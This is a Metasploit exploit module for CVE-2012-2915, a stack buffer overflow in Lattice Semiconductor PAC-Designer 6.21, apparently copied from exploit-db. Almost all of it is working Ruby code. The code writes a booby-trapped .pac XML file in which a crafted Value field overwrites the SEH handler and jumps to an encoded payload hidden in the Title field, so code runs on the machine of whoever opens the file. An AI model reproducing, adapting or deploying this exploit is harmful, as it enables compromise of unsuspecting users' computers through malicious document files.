Lattice Semiconductor PAC-Designer 6.21 – Symbol Value Buffer Overflow (Metasploit)

  • 作者: Metasploit
    日期: 2012-06-17
  • 类别:
    平台:
  • 来源:https://www.exploit-db.com/exploits/19175/
  • ##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT

	def initialize(info={})
		super(update_info(info,
			'Name' => "Lattice Semiconductor PAC-Designer 6.21 Symbol Value Buffer Overflow",
			'Description'=> %q{
					This module exploits a vulnerability found in Lattice Semiconductor PAC-Designer
				6.21.As a .pac file, when supplying a long string of data to the 'value' field
				under the 'SymbolicSchematicData' tag, it is possible to cause a memory corruption
				on the stack, which results in arbitrary code execution under the context of the
				user.
			},
			'License'=> MSF_LICENSE,
			'Author' =>
				[
					'Unknown',#Discovery
					'juan vazquez', #Metasploit
					'sinn3r'#Metasploit
				],
			'References' =>
				[
					['CVE', '2012-2915'],
					['OSVDB', '82001'],
					['EDB', '19006'],
					['BID', '53566'],
					['URL', 'http://secunia.com/advisories/48741']
				],
			'Payload'=>
				{
					'BadChars' => "\x00\x3c\x3e",
					'StackAdjustment' => -3500,
				},
			'DefaultOptions'=>
				{
					'ExitFunction' => "seh"
				},
			'Platform' => 'win',
			'Targets'=>
				[
					[
						'PAC-Designer 6.21 on Windows XP SP3',
						{
							# P/P/R in PACD621.exe
							# ASLR: False, Rebase: False, SafeSEH: False, OS: False
							'Ret' => 0x00805020
						}
					],
				],
			'Privileged' => false,
			'DisclosureDate' => "May 16 2012",
			'DefaultTarget'=> 0))

		register_options(
			[
				OptString.new('FILENAME', [true, 'The filename', 'msf.pac'])
			], self.class)
	end

	def exploit
		# The payload is placed in the <title> field
		p = payload.encoded

		# The trigger is placed in the <value> field, which will jmp to our
		# payload in the <title> field.
		buf= "\x5f"#POP EDI
		buf << "\x5f"#POP EDI
		buf << "\x5c"#POP ESP
		buf << "\x61"*6#POPAD x 6
		buf << "\x51"#PUSH ECX
		buf << "\xc3"#RET
		buf << rand_text_alpha(96-buf.length, payload_badchars)
		buf << "\xeb\x9e#{rand_text_alpha(2, payload_badchars)}"#Jmp back to the beginning of the buffer
		buf << [target.ret].pack('V')[0,3] # Partial overwrite

		xml = %Q|<?xml version="1.0"?>
<PacDesignData>
	<DocFmtVersion>1</DocFmtVersion>
	<DeviceType>ispPAC-CLK5410D</DeviceType>
	<CreatedBy>PAC-Designer 6.21.1336</CreatedBy>
	<SummaryInformation>
		<Title>#{p}</Title>
		<Author>#{Rex::Text.rand_text_alpha(6)}</Author>
	</SummaryInformation>

	<SymbolicSchematicData>
		<Symbol>
			<SymKey>153</SymKey>
			<NameText>Profile 0 Ref Frequency</NameText>
			<Value>#{buf}</Value>
		</Symbol>
	</SymbolicSchematicData>
</PacDesignData>|

		file_create(xml)
	end
end
    PowerShell